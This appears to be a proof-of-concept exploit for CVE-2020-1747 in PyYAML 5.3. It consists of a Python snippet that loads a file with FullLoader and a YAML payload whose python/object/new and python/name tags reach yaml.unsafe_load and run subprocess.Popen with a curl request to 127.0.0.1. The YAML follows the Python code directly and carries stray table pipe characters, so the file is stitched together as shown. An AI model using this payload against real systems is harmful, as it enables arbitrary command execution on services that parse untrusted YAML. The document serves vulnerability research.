CVE-2020-1747 PyYAML PoC
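# Reproduces only on pyyaml==5.3; the loader-side fix shipped in 5.3.1, so
# anything at or above that version should refuse the payload.
# Report: ret2libc's write-up in https://github.com/yaml/pyyaml/pull/386
# Explanation: https://2130706433.net/blog/pyyaml/
import yaml  # explicit module import instead of a wildcard so `load`/`FullLoader` are clearly yaml's

# Read the document as raw bytes; yaml.load accepts bytes as well as str, and
# opening in binary mode leaves the payload exactly as it was written.
with open('payload.yaml', 'rb') as f:
    content = f.read()

# FullLoader is the vulnerable loader on 5.3: in that release it still honours
# the python/object/new and python/name tags the payload relies on (see
# CVE-2020-1747). For untrusted input the loader to use is SafeLoader
# (yaml.safe_load), which rejects every python/* tag regardless of version.
data = yaml.load(content, Loader=yaml.FullLoader)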
# The `extend` function is overriden to run `yaml.unsafe_load` with | |
# custom `listitems` argument, in this case a simple curl request | |
- !!python/object/new:yaml.MappingNode | |
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://127.0.0.1/rce"]]' | |
state: | |
tag: !!str dummy | |
value: !!str dummy | |
extend: !!python/name:yaml.unsafe_load |